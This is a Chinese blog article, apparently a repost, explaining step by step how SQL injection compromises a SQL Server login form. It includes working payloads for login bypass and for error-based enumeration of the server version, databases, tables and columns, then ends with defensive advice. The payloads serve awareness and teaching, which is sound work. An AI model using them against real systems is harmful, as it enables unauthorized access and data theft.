溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

SQL注入全過程的深入分析是怎樣的

發(fā)布時間:2021-11-30 19:40:26 來源:億速云 閱讀:166 作者:柒染 欄目:數(shù)據(jù)庫

這篇文章將為大家詳細(xì)講解有關(guān)SQL注入全過程的深入分析是怎樣的,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。

分析了SQL注入全過程,具體如下:

初步注入--繞過驗(yàn)證,直接登錄

公司網(wǎng)站登陸框如下:

可以看到除了賬號密碼之外,還有一個公司名的輸入框,根據(jù)輸入框的形式不難推出SQL的寫法如下:復(fù)制代碼 代碼如下: SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ'

我發(fā)現(xiàn)前兩者都做一些檢查,而第三個輸入框卻疏忽了,漏洞就在這里!注入開始,在輸入框中輸入以下內(nèi)容:

用戶名亂填,密碼留空,這種情況下點(diǎn)擊登錄按鈕后竟然成功登錄了。

我們看一下最終的SQL就會找到原因:復(fù)制代碼 代碼如下: SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=1--'

從代碼可以看出,前一半單引號被閉合,后一半單引號被 “--”給注釋掉,中間多了一個永遠(yuǎn)成立的條件“1=1”,這就造成任何字符都能成功登錄的結(jié)果。而Sql注入的危害卻不僅僅是匿名登錄。

中級注入--借助異常獲取信息

現(xiàn)在我們在第三個輸入框中寫入:

‘or 1=(SELECT @@version) –

如下:

后臺的SQL變成了這樣:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp=''or 1=(SELECT @@VERSION)--'

判斷條件變成了1=(SELECT @@VERSION),

這個寫法肯定會導(dǎo)致錯誤,但出錯正是我們想要的。點(diǎn)擊登錄后,頁面出現(xiàn)以下信息:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3) - 10.0.5500.0 (X64) Sep 21 2011 22:45:45Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit)on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.

可怕的事情出現(xiàn)了,服務(wù)器的操作系統(tǒng)和SQL Server版本信息竟然通過錯誤顯示出來。

危害擴(kuò)大--獲取服務(wù)器所有的庫名、表名、字段名

接著,我們在輸入框中輸入如下信息:復(fù)制代碼 代碼如下: t' or 1=(SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--

此時發(fā)現(xiàn)第三個輸入框有字?jǐn)?shù)長度的限制,然而這種客戶端的限制形同虛設(shè),

直接通過Google瀏覽器就能去除。

點(diǎn)擊登錄,返回的信息如下:

Conversion failed when converting the nvarchar value 'master' to data type int.

數(shù)據(jù)庫名稱“master”通過異常被顯示出來!依次改變上面SQL語句中的序號,

就能得到服務(wù)器上所有數(shù)據(jù)庫的名稱。

接著,輸入信息如下:復(fù)制代碼 代碼如下: b' or 1=(SELECT top 1 name FROM master..sysobjects where xtype='U' and name not in (SELECT top 1 name FROM master..sysobjects where xtype='U'))--

得到返回信息如下:

Conversion failed when converting the nvarchar value 'spt_fallback_db' to data type int.

我們得到了master數(shù)據(jù)庫中的第一張表名:“spt_fallback_db”,

同上,依次改變序號,可得到該庫全部表名。

現(xiàn)在我們以“spt_fallback_db”表為例,嘗試獲取該表中所有的字段名。在輸入框中輸入以下代碼:復(fù)制代碼 代碼如下: b' or 1=(SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='spt_fallback_db');

于是,得到錯誤提示如下:

"Conversion failed when converting the nvarchar value 'xserver_name' to data type int.";

這樣第一個字段名“xserver_name”就出來了,依次改變序號,就能遍歷出所有的字段名。

最終目的--獲取數(shù)據(jù)庫中的數(shù)據(jù)

寫到這里,我們已知通過SQL注入能獲取全部的數(shù)據(jù)庫,表,及其字段,為了防止本文完全淪為注入教程,獲取數(shù)據(jù)的代碼就不再描述,而這篇文章的目的也已達(dá)到,SQL注入意味著什么?意味著數(shù)據(jù)庫中所有數(shù)據(jù)都能被盜取。

當(dāng)知道這個危害以后,是否還能有人對SQL注入漏洞置之不理?

結(jié)語

關(guān)于安全性,總結(jié)出一下幾點(diǎn):

1.對用戶輸入的內(nèi)容要時刻保持警惕。

2. 只有客戶端的驗(yàn)證等于沒有驗(yàn)證。

3. 永遠(yuǎn)不要把服務(wù)器錯誤信息暴露給用戶。

除此之外,我還要補(bǔ)充幾點(diǎn):SQL注入不僅能通過輸入框,還能通過Url達(dá)到目的。

2. 除了服務(wù)器錯誤頁面,還有其他辦法獲取到數(shù)據(jù)庫信息。

3. 可通過軟件模擬注入行為,這種方式盜取信息的速度要比你想象中快的多。

4. 漏洞跟語言平臺無關(guān)。

關(guān)于SQL注入全過程的深入分析是怎樣的就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,可以學(xué)到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

sql
AI